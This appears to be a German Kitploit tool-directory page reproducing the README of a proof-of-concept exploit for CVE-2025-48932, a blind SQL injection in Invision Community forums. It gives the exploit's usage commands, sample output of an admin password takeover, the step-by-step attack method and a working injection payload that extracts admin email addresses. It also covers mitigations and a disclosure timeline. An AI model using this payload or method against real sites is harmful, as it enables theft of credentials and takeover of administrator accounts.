Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Einreichen
ToolsExploitsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-48932---exploit — Proof-of-Concept-Exploit für CVE-2025-48932, eine SQL-Injection in Invision Community <= 4.7.20. Extrahiert Admin-Anmeldeinformationen und setzt Passwörter über blinde SQLi zurück. Nur für autorisierte Tests. | Kitploit
Tools/GitHubGitHub/xploitgh0st/cve-2025-48932---exploit
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsLernen & Bildung
GitHubxploitgh0st/cve-2025-48932---exploit

CVE-2025-48932---exploit

Proof-of-Concept-Exploit für CVE-2025-48932, eine SQL-Injection in Invision Community <= 4.7.20. Extrahiert Admin-Anmeldeinformationen und setzt Passwörter über blinde SQLi zurück. Nur für autorisierte Tests.

Repository anzeigen
2vor 10 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

Invision Community SQL Injection Exploit (CVE-2025-48932)

Python Version License CVE

Ein Proof-of-Concept-Exploit, der eine SQL-Injection-Schwachstelle in Invision Community Versionen <= 4.7.20 demonstriert.

⚠️ Haftungsausschluss

Dieses Tool ist ausschließlich für Bildungszwecke und autorisierte Sicherheitstests vorgesehen.

  • Unautorisierter Zugriff auf Computersysteme ist ILLEGAL
  • Verwenden Sie dieses Tool nur auf Systemen, die Ihnen gehören oder für die Sie eine ausdrückliche schriftliche Genehmigung zum Testen haben
  • Der Autor ist NICHT VERANTWORTLICH für Missbrauch oder Schäden, die durch dieses Tool verursacht werden
  • Dies ist nur für Sicherheitsforscher, Penetrationstester und Bildungszwecke bestimmt

📋 Inhaltsverzeichnis

  • Schwachstellenbeschreibung
  • Anforderungen
  • Installation
  • Verwendung
  • Funktionsweise
  • Gegenmaßnahmen
  • Danksagungen
  • Referenzen

🔍 Schwachstellenbeschreibung

CVE-ID: CVE-2025-48932
Schweregrad: Hoch
CVSS-Score: Noch offen
Betroffene Versionen: Invision Community 4.x vor 4.7.21

Die Schwachstelle besteht im Skript /applications/calendar/modules/front/calendar/view.php. Benutzereingaben, die über den Parameter location in der Methode IPS\calendar\modules\front\calendar\view::search() übergeben werden, werden vor der Verwendung in SQL-Abfragen nicht ordnungsgemäß bereinigt.

Dies erlaubt entfernten, nicht authentifizierten Angreifern Folgendes:

  • Sensible Daten aus der Datenbank extrahieren
  • Admin-Anmeldedaten auslesen
  • Möglicherweise Admin-Kontoübernahme

Voraussetzungen für die Ausnutzung:

  • Die Kalenderanwendung muss installiert sein
  • Die GeoLocation-Funktion (z. B. Google Maps) muss konfiguriert sein

Hinweis: Während SQL-Injection-Schwachstellen in Invision Community 4.x Versionen < 4.7.18 zu Admin-Kontoübernahme und RCE durch Zurücksetzen des Admin-Passworts führen konnten, wurde in Version 4.7.18 ein neuer Sicherheitsverschlüsselungsschlüssel im Mechanismus zum Zurücksetzen von Passwörtern eingeführt, was diesen Angriffsvektor erschwert.

📦 Anforderungen

  • Python 3.7 oder höher
  • pip (Python-Paketmanager)
  • Internetverbindung
  • Zielsystem mit Invision Community <= 4.7.20 mit:
    • Installierter Kalenderanwendung
    • Konfigurierter GeoLocation-Funktion

🚀 Installation

  1. Repository klonen:

    git clone https://github.com/yourusername/invision-sqli-exploit.git
    cd invision-sqli-exploit
    
  2. Abhängigkeiten installieren:

    pip install -r requirements.txt
    

💻 Verwendung

Grundlegende Verwendung

python invision-sqli-exploit.py -u http://target.com/forum/

Ausführlicher Modus (für Debugging)

python invision-sqli-exploit.py -u https://example.com/community/ -v

Befehlszeilenargumente

ArgumentBeschreibungErforderlich
-u, --urlZiel-URL der Invision CommunityJa
-v, --verboseAusführliche Ausgabe für Debugging aktivierenNein
-h, --helpHilfemeldung anzeigen und beendenNein

Beispielausgabe

==================================================
Invision Community <= 4.7.20 SQL Injection Exploit
CVE-2025-48932
==================================================
Ziel: http://example.com/forum/
==================================================

[*] CSRF-Token abrufen...
[+] CSRF-Token gefunden: abc123def456...
[*] Schritt 1: Admin-E-Mail-Adresse extrahieren...
[*] Daten extrahieren: [email protected]
[+] Admin-E-Mail: [email protected]

[!] Schritt 2: Manuelle Aktion erforderlich!

Bitte führen Sie diese Schritte aus:
1. Navigieren Sie zu: http://example.com/forum/index.php?/lostpassword/
2. Fordern Sie ein Passwort-Reset mit der E-Mail an: [email protected]
3. Drücken Sie ENTER, wenn fertig...

[*] Schritt 3: Validierungsschlüssel für Passwort-Reset extrahieren...
[*] Daten extrahieren: xyz789abc123...
[+] Reset-Schlüssel: xyz789abc123...
[*] Schritt 4: Admin-Passwort zurücksetzen...

==================================================
[+] AUSBEUTUNG ERFOLGREICH!
==================================================

Admin-Anmeldedaten:
  E-Mail:    [email protected]
  Passwort: Pwned1721234567

Sie können sich jetzt anmelden unter: http://example.com/forum/index.php?/login/

🔬 Funktionsweise

Der Exploit funktioniert in vier Hauptschritten:

1. CSRF-Token-Extraktion

Das Skript ruft zunächst ein CSRF-Token von der Zielwebsite ab, das für nachfolgende Anfragen erforderlich ist.

2. Boolesche blinde SQL-Injection

Mithilfe eines binären Suchalgorithmus extrahiert der Exploit Daten Zeichen für Zeichen aus der Datenbank:

  • Testet jedes Zeichen mithilfe konditionaler SQL-Abfragen
  • Verwendet die RLIKE-Funktion mit Regex-Mustern, um wahr/falsch-Bedingungen zu erkennen
  • Fehlermeldungen zeigen erfolgreiche Bedingungen an

3. Admin-E-Mail-Extraktion

Fragt die Tabelle core_members ab, um die E-Mail-Adresse des Administrators zu extrahieren.

4. Passwort-Reset-Ausnutzung

  • Der Angreifer leitet manuell ein Passwort-Reset für das Admin-Konto ein
  • Der Exploit extrahiert den Validierungsschlüssel für das Passwort-Reset aus der Datenbank
  • Verwendet den Validierungsschlüssel, um das Admin-Passwort ohne E-Mail-Zugriff zurückzusetzen

Technische Details

Angriffspunkt:

location-Parameter → calendar/view.php → search()-Methode

Payload-Beispiel:

'))OR(SELECT 1 RLIKE(IF(ORD(SUBSTR((SELECT email FROM core_members WHERE member_id=1),1,1))<128,0x28,0x31)))#

Ausbeutungstechnik: Boolesche blinde SQL-Injection unter Verwendung binärer Suche zur effizienten Datenextraktion.

🛡️ Gegenmaßnahmen

Für Benutzer

Sofortmaßnahmen:

  1. Upgrade auf Version 4.7.21 oder höher - Diese Version patcht die Schwachstelle
  2. Kalenderanwendung deaktivieren, falls nicht in Gebrauch
  3. Zugriffsprotokolle überwachen auf verdächtige Aktivitäten
  4. Admin-Konten überprüfen auf unbefugten Zugriff

Für Entwickler

Sichere Codierungspraktiken:

  1. Verwenden Sie parametrisierte Abfragen/vorbereitete Anweisungen - Verketten Sie niemals Benutzereingaben in SQL-Abfragen
  2. Eingabevalidierung - Validieren und bereinigen Sie alle Benutzereingaben
  3. Prinzip der geringsten Privilegien - Datenbankbenutzer sollten nur die minimal erforderlichen Berechtigungen haben
  4. Web Application Firewall (WAF) - Setzen Sie WAF-Regeln ein, um SQL-Injection-Versuche zu erkennen
  5. Regelmäßige Sicherheitsaudits - Führen Sie regelmäßige Code-Reviews und Penetrationstests durch

Beispiel für sicheren Code:

// Angreifbarer Code
$location = $_REQUEST['location'];
$query = "SELECT * FROM events WHERE location = '$location'";

// Sicherer Code
$location = $_REQUEST['location'];
$query = $db->prepare("SELECT * FROM events WHERE location = ?");
$query->execute([$location]);

📅 Offenlegungszeitplan

DatumEreignis
16. Mai 2025Anbieter benachrichtigt
27. Mai 2025Version 4.7.21 veröffentlicht
28. Mai 2025CVE-Kennung beantragt
28. Mai 2025CVE-2025-48932 zugewiesen
23. Juli 2025Öffentliche Offenlegung

👏 Danksagungen

Entwickler:

  • nanda

Hinweis: Dies ist eine unabhängige Implementierung basierend auf öffentlich zugänglichen Informationen zur Schwachstelle (CVE-2025-48932)

📚 Referenzen

Tool herunterladen